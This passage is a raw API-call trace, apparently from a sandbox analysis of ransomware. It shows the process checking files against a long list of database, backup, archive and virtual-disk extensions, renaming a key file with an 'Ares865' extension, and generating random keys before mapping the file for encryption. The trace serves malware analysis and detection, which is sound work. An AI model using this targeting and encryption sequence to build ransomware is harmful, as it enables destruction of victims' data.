(lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="MSBuild") returned -1 [0089.642] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.642] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 50 [0089.642] lstrcpyW (in: lpString1=0x2cce462, lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0089.642] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.642] lstrlenW (lpString="Ares865") returned 7 [0089.642] lstrcmpiW (lpString1="416e53f", lpString2="Ares865") returned -1 [0089.642] lstrlenW (lpString=".dll") returned 4 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".dll") returned 1 [0089.642] lstrlenW (lpString=".lnk") returned 4 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".lnk") returned 1 [0089.642] lstrlenW (lpString=".ini") returned 4 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".ini") returned 1 [0089.642] lstrlenW (lpString=".sys") returned 4 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".sys") returned 1 [0089.642] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.642] lstrlenW (lpString="bak") returned 3 [0089.642] lstrcmpiW (lpString1="53f", lpString2="bak") returned -1 [0089.642] lstrlenW (lpString="ba_") returned 3 [0089.642] lstrcmpiW (lpString1="53f", lpString2="ba_") returned -1 [0089.642] lstrlenW (lpString="dbb") returned 3 [0089.642] lstrcmpiW (lpString1="53f", lpString2="dbb") returned -1 [0089.642] lstrlenW (lpString="vmdk") returned 4 [0089.642] lstrcmpiW (lpString1="e53f", lpString2="vmdk") returned -1 [0089.642] lstrlenW (lpString="rar") returned 3 [0089.642] lstrcmpiW (lpString1="53f", lpString2="rar") returned -1 [0089.642] lstrlenW (lpString="zip") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="zip") returned -1 [0089.643] lstrlenW (lpString="tgz") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="tgz") returned -1 [0089.643] lstrlenW (lpString="vbox") returned 4 [0089.643] lstrcmpiW (lpString1="e53f", lpString2="vbox") returned -1 [0089.643] lstrlenW (lpString="vdi") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="vdi") returned -1 [0089.643] lstrlenW (lpString="vhd") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="vhd") returned -1 [0089.643] lstrlenW (lpString="vhdx") returned 4 [0089.643] lstrcmpiW (lpString1="e53f", lpString2="vhdx") returned -1 [0089.643] lstrlenW (lpString="avhd") returned 4 [0089.643] lstrcmpiW (lpString1="e53f", lpString2="avhd") returned 1 [0089.643] lstrlenW (lpString="db") returned 2 [0089.643] lstrcmpiW (lpString1="3f", lpString2="db") returned -1 [0089.643] lstrlenW (lpString="db2") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="db2") returned -1 [0089.643] lstrlenW (lpString="db3") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="db3") returned -1 [0089.643] lstrlenW (lpString="dbf") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="dbf") returned -1 [0089.643] lstrlenW (lpString="mdf") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="mdf") returned -1 [0089.643] lstrlenW (lpString="mdb") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="mdb") returned -1 [0089.643] lstrlenW (lpString="sql") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="sql") returned -1 [0089.643] lstrlenW (lpString="sqlite") returned 6 [0089.643] lstrcmpiW (lpString1="16e53f", lpString2="sqlite") returned -1 [0089.643] lstrlenW (lpString="sqlite3") returned 7 [0089.643] lstrcmpiW (lpString1="416e53f", lpString2="sqlite3") returned -1 [0089.643] lstrlenW (lpString="sqlitedb") returned 8 [0089.643] lstrcmpiW (lpString1="c416e53f", lpString2="sqlitedb") returned -1 [0089.643] lstrlenW (lpString="xml") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="xml") returned -1 [0089.643] lstrlenW (lpString="$er") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="$er") returned 1 [0089.643] lstrlenW (lpString="4dd") returned 3 [0089.643] lstrcmpiW (lpString1="53f", lpString2="4dd") returned 1 [0089.644] lstrlenW (lpString="4dl") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="4dl") returned 1 [0089.644] lstrlenW (lpString="^^^") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="^^^") returned 1 [0089.644] lstrlenW (lpString="abs") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="abs") returned -1 [0089.644] lstrlenW (lpString="abx") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="abx") returned -1 [0089.644] lstrlenW (lpString="accdb") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accdb") returned -1 [0089.644] lstrlenW (lpString="accdc") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accdc") returned -1 [0089.644] lstrlenW (lpString="accde") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accde") returned -1 [0089.644] lstrlenW (lpString="accdr") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accdr") returned -1 [0089.644] lstrlenW (lpString="accdt") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accdt") returned -1 [0089.644] lstrlenW (lpString="accdw") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accdw") returned -1 [0089.644] lstrlenW (lpString="accft") returned 5 [0089.644] lstrcmpiW (lpString1="6e53f", lpString2="accft") returned -1 [0089.644] lstrlenW (lpString="adb") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="adb") returned -1 [0089.644] lstrlenW (lpString="adb") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="adb") returned -1 [0089.644] lstrlenW (lpString="ade") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="ade") returned -1 [0089.644] lstrlenW (lpString="adf") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="adf") returned -1 [0089.644] lstrlenW (lpString="adn") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="adn") returned -1 [0089.644] lstrlenW (lpString="adp") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="adp") returned -1 [0089.644] lstrlenW (lpString="alf") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="alf") returned -1 [0089.644] lstrlenW (lpString="ask") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="ask") returned -1 [0089.644] lstrlenW (lpString="btr") returned 3 [0089.644] lstrcmpiW (lpString1="53f", lpString2="btr") returned -1 [0089.645] lstrlenW (lpString="cat") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="cat") returned -1 [0089.645] lstrlenW (lpString="cdb") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="cdb") returned -1 [0089.645] lstrlenW (lpString="ckp") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="ckp") returned -1 [0089.645] lstrlenW (lpString="cma") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="cma") returned -1 [0089.645] lstrlenW (lpString="cpd") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="cpd") returned -1 [0089.645] lstrlenW (lpString="dacpac") returned 6 [0089.645] lstrcmpiW (lpString1="16e53f", lpString2="dacpac") returned -1 [0089.645] lstrlenW (lpString="dad") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dad") returned -1 [0089.645] lstrlenW (lpString="dadiagrams") returned 10 [0089.645] lstrcmpiW (lpString1="9ec416e53f", lpString2="dadiagrams") returned -1 [0089.645] lstrlenW (lpString="daschema") returned 8 [0089.645] lstrcmpiW (lpString1="c416e53f", lpString2="daschema") returned -1 [0089.645] lstrlenW (lpString="db-journal") returned 10 [0089.645] lstrcmpiW (lpString1="9ec416e53f", lpString2="db-journal") returned -1 [0089.645] lstrlenW (lpString="db-shm") returned 6 [0089.645] lstrcmpiW (lpString1="16e53f", lpString2="db-shm") returned -1 [0089.645] lstrlenW (lpString="db-wal") returned 6 [0089.645] lstrcmpiW (lpString1="16e53f", lpString2="db-wal") returned -1 [0089.645] lstrlenW (lpString="dbc") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dbc") returned -1 [0089.645] lstrlenW (lpString="dbs") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dbs") returned -1 [0089.645] lstrlenW (lpString="dbt") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dbt") returned -1 [0089.645] lstrlenW (lpString="dbv") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dbv") returned -1 [0089.645] lstrlenW (lpString="dbx") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dbx") returned -1 [0089.645] lstrlenW (lpString="dcb") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dcb") returned -1 [0089.645] lstrlenW (lpString="dct") returned 3 [0089.645] lstrcmpiW (lpString1="53f", lpString2="dct") returned -1 [0089.645] lstrlenW (lpString="dcx") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dcx") returned -1 [0089.646] lstrlenW (lpString="ddl") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="ddl") returned -1 [0089.646] lstrlenW (lpString="dlis") returned 4 [0089.646] lstrcmpiW (lpString1="e53f", lpString2="dlis") returned 1 [0089.646] lstrlenW (lpString="dp1") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dp1") returned -1 [0089.646] lstrlenW (lpString="dqy") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dqy") returned -1 [0089.646] lstrlenW (lpString="dsk") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dsk") returned -1 [0089.646] lstrlenW (lpString="dsn") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dsn") returned -1 [0089.646] lstrlenW (lpString="dtsx") returned 4 [0089.646] lstrcmpiW (lpString1="e53f", lpString2="dtsx") returned 1 [0089.646] lstrlenW (lpString="dxl") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="dxl") returned -1 [0089.646] lstrlenW (lpString="eco") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="eco") returned -1 [0089.646] lstrlenW (lpString="ecx") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="ecx") returned -1 [0089.646] lstrlenW (lpString="edb") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="edb") returned -1 [0089.646] lstrlenW (lpString="epim") returned 4 [0089.646] lstrcmpiW (lpString1="e53f", lpString2="epim") returned -1 [0089.646] lstrlenW (lpString="fcd") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="fcd") returned -1 [0089.646] lstrlenW (lpString="fdb") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="fdb") returned -1 [0089.646] lstrlenW (lpString="fic") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="fic") returned -1 [0089.646] lstrlenW (lpString="flexolibrary") returned 12 [0089.646] lstrcmpiW (lpString1="7d9ec416e53f", lpString2="flexolibrary") returned -1 [0089.646] lstrlenW (lpString="fm5") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="fm5") returned -1 [0089.646] lstrlenW (lpString="fmp") returned 3 [0089.646] lstrcmpiW (lpString1="53f", lpString2="fmp") returned -1 [0089.646] lstrlenW (lpString="fmp12") returned 5 [0089.647] lstrcmpiW (lpString1="6e53f", lpString2="fmp12") returned -1 [0089.647] lstrlenW (lpString="fmpsl") returned 5 [0089.647] lstrcmpiW (lpString1="6e53f", lpString2="fmpsl") returned -1 [0089.647] lstrlenW (lpString="fol") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fol") returned -1 [0089.647] lstrlenW (lpString="fp3") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fp3") returned -1 [0089.647] lstrlenW (lpString="fp4") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fp4") returned -1 [0089.647] lstrlenW (lpString="fp5") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fp5") returned -1 [0089.647] lstrlenW (lpString="fp7") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fp7") returned -1 [0089.647] lstrlenW (lpString="fpt") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="fpt") returned -1 [0089.647] lstrlenW (lpString="frm") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="frm") returned -1 [0089.647] lstrlenW (lpString="gdb") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="gdb") returned -1 [0089.647] lstrlenW (lpString="gdb") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="gdb") returned -1 [0089.647] lstrlenW (lpString="grdb") returned 4 [0089.647] lstrcmpiW (lpString1="e53f", lpString2="grdb") returned -1 [0089.647] lstrlenW (lpString="gwi") returned 3 [0089.647] lstrcmpiW (lpString1="53f", lpString2="gwi") returned -1 [0089.647] lstrlenW (lpString="hdb") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="hdb") returned -1 [0089.648] lstrlenW (lpString="his") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="his") returned -1 [0089.648] lstrlenW (lpString="ib") returned 2 [0089.648] lstrcmpiW (lpString1="3f", lpString2="ib") returned -1 [0089.648] lstrlenW (lpString="idb") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="idb") returned -1 [0089.648] lstrlenW (lpString="ihx") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="ihx") returned -1 [0089.648] lstrlenW (lpString="itdb") returned 4 [0089.648] lstrcmpiW (lpString1="e53f", lpString2="itdb") returned -1 [0089.648] lstrlenW (lpString="itw") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="itw") returned -1 [0089.648] lstrlenW (lpString="jet") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="jet") returned -1 [0089.648] lstrlenW (lpString="jtx") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="jtx") returned -1 [0089.648] lstrlenW (lpString="kdb") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="kdb") returned -1 [0089.648] lstrlenW (lpString="kexi") returned 4 [0089.648] lstrcmpiW (lpString1="e53f", lpString2="kexi") returned -1 [0089.648] lstrlenW (lpString="kexic") returned 5 [0089.648] lstrcmpiW (lpString1="6e53f", lpString2="kexic") returned -1 [0089.648] lstrlenW (lpString="kexis") returned 5 [0089.648] lstrcmpiW (lpString1="6e53f", lpString2="kexis") returned -1 [0089.648] lstrlenW (lpString="lgc") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="lgc") returned -1 [0089.648] lstrlenW (lpString="lwx") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="lwx") returned -1 [0089.648] lstrlenW (lpString="maf") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="maf") returned -1 [0089.648] lstrlenW (lpString="maq") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="maq") returned -1 [0089.648] lstrlenW (lpString="mar") returned 3 [0089.648] lstrcmpiW (lpString1="53f", lpString2="mar") returned -1 [0089.648] lstrlenW (lpString="marshal") returned 7 [0089.648] lstrcmpiW (lpString1="416e53f", lpString2="marshal") returned -1 [0089.648] lstrlenW (lpString="mas") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mas") returned -1 [0089.649] lstrlenW (lpString="mav") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mav") returned -1 [0089.649] lstrlenW (lpString="maw") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="maw") returned -1 [0089.649] lstrlenW (lpString="mdbhtml") returned 7 [0089.649] lstrcmpiW (lpString1="416e53f", lpString2="mdbhtml") returned -1 [0089.649] lstrlenW (lpString="mdn") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mdn") returned -1 [0089.649] lstrlenW (lpString="mdt") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mdt") returned -1 [0089.649] lstrlenW (lpString="mfd") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mfd") returned -1 [0089.649] lstrlenW (lpString="mpd") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mpd") returned -1 [0089.649] lstrlenW (lpString="mrg") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mrg") returned -1 [0089.649] lstrlenW (lpString="mud") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mud") returned -1 [0089.649] lstrlenW (lpString="mwb") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="mwb") returned -1 [0089.649] lstrlenW (lpString="myd") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="myd") returned -1 [0089.649] lstrlenW (lpString="ndf") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="ndf") returned -1 [0089.649] lstrlenW (lpString="nnt") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="nnt") returned -1 [0089.649] lstrlenW (lpString="nrmlib") returned 6 [0089.649] lstrcmpiW (lpString1="16e53f", lpString2="nrmlib") returned -1 [0089.649] lstrlenW (lpString="ns2") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="ns2") returned -1 [0089.649] lstrlenW (lpString="ns3") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="ns3") returned -1 [0089.649] lstrlenW (lpString="ns4") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="ns4") returned -1 [0089.649] lstrlenW (lpString="nsf") returned 3 [0089.649] lstrcmpiW (lpString1="53f", lpString2="nsf") returned -1 [0089.649] lstrlenW (lpString="nv") returned 2 [0089.649] lstrcmpiW (lpString1="3f", lpString2="nv") returned -1 [0089.649] lstrlenW (lpString="nv2") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="nv2") returned -1 [0089.650] lstrlenW (lpString="nwdb") returned 4 [0089.650] lstrcmpiW (lpString1="e53f", lpString2="nwdb") returned -1 [0089.650] lstrlenW (lpString="nyf") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="nyf") returned -1 [0089.650] lstrlenW (lpString="odb") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="odb") returned -1 [0089.650] lstrlenW (lpString="odb") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="odb") returned -1 [0089.650] lstrlenW (lpString="oqy") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="oqy") returned -1 [0089.650] lstrlenW (lpString="ora") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="ora") returned -1 [0089.650] lstrlenW (lpString="orx") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="orx") returned -1 [0089.650] lstrlenW (lpString="owc") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="owc") returned -1 [0089.650] lstrlenW (lpString="p96") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="p96") returned -1 [0089.650] lstrlenW (lpString="p97") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="p97") returned -1 [0089.650] lstrlenW (lpString="pan") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="pan") returned -1 [0089.650] lstrlenW (lpString="pdb") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="pdb") returned -1 [0089.650] lstrlenW (lpString="pdm") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="pdm") returned -1 [0089.650] lstrlenW (lpString="pnz") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="pnz") returned -1 [0089.650] lstrlenW (lpString="qry") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="qry") returned -1 [0089.650] lstrlenW (lpString="qvd") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="qvd") returned -1 [0089.650] lstrlenW (lpString="rbf") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="rbf") returned -1 [0089.650] lstrlenW (lpString="rctd") returned 4 [0089.650] lstrcmpiW (lpString1="e53f", lpString2="rctd") returned -1 [0089.650] lstrlenW (lpString="rod") returned 3 [0089.650] lstrcmpiW (lpString1="53f", lpString2="rod") returned -1 [0089.651] lstrlenW (lpString="rodx") returned 4 [0089.651] lstrcmpiW (lpString1="e53f", lpString2="rodx") returned -1 [0089.651] lstrlenW (lpString="rpd") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="rpd") returned -1 [0089.651] lstrlenW (lpString="rsd") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="rsd") returned -1 [0089.651] lstrlenW (lpString="sas7bdat") returned 8 [0089.651] lstrcmpiW (lpString1="c416e53f", lpString2="sas7bdat") returned -1 [0089.651] lstrlenW (lpString="sbf") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="sbf") returned -1 [0089.651] lstrlenW (lpString="scx") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="scx") returned -1 [0089.651] lstrlenW (lpString="sdb") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="sdb") returned -1 [0089.651] lstrlenW (lpString="sdc") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="sdc") returned -1 [0089.651] lstrlenW (lpString="sdf") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="sdf") returned -1 [0089.651] lstrlenW (lpString="sis") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="sis") returned -1 [0089.651] lstrlenW (lpString="spq") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="spq") returned -1 [0089.651] lstrlenW (lpString="te") returned 2 [0089.651] lstrcmpiW (lpString1="3f", lpString2="te") returned -1 [0089.651] lstrlenW (lpString="teacher") returned 7 [0089.651] lstrcmpiW (lpString1="416e53f", lpString2="teacher") returned -1 [0089.651] lstrlenW (lpString="tmd") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="tmd") returned -1 [0089.651] lstrlenW (lpString="tps") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="tps") returned -1 [0089.651] lstrlenW (lpString="trc") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="trc") returned -1 [0089.651] lstrlenW (lpString="trc") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="trc") returned -1 [0089.651] lstrlenW (lpString="trm") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="trm") returned -1 [0089.651] lstrlenW (lpString="udb") returned 3 [0089.651] lstrcmpiW (lpString1="53f", lpString2="udb") returned -1 [0089.651] lstrlenW (lpString="udl") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="udl") returned -1 [0089.652] lstrlenW (lpString="usr") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="usr") returned -1 [0089.652] lstrlenW (lpString="v12") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="v12") returned -1 [0089.652] lstrlenW (lpString="vis") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="vis") returned -1 [0089.652] lstrlenW (lpString="vpd") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="vpd") returned -1 [0089.652] lstrlenW (lpString="vvv") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="vvv") returned -1 [0089.652] lstrlenW (lpString="wdb") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="wdb") returned -1 [0089.652] lstrlenW (lpString="wmdb") returned 4 [0089.652] lstrcmpiW (lpString1="e53f", lpString2="wmdb") returned -1 [0089.652] lstrlenW (lpString="wrk") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="wrk") returned -1 [0089.652] lstrlenW (lpString="xdb") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="xdb") returned -1 [0089.652] lstrlenW (lpString="xld") returned 3 [0089.652] lstrcmpiW (lpString1="53f", lpString2="xld") returned -1 [0089.652] lstrlenW (lpString="xmlff") returned 5 [0089.652] lstrcmpiW (lpString1="6e53f", lpString2="xmlff") returned -1 [0089.652] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 126 [0089.652] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwFlags=0x1) returned 1 [0089.653] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.653] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47) returned 1 [0089.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.654] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.654] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.654] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.655] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x15c [0089.658] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0089.658] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.660] HeapFree (in: 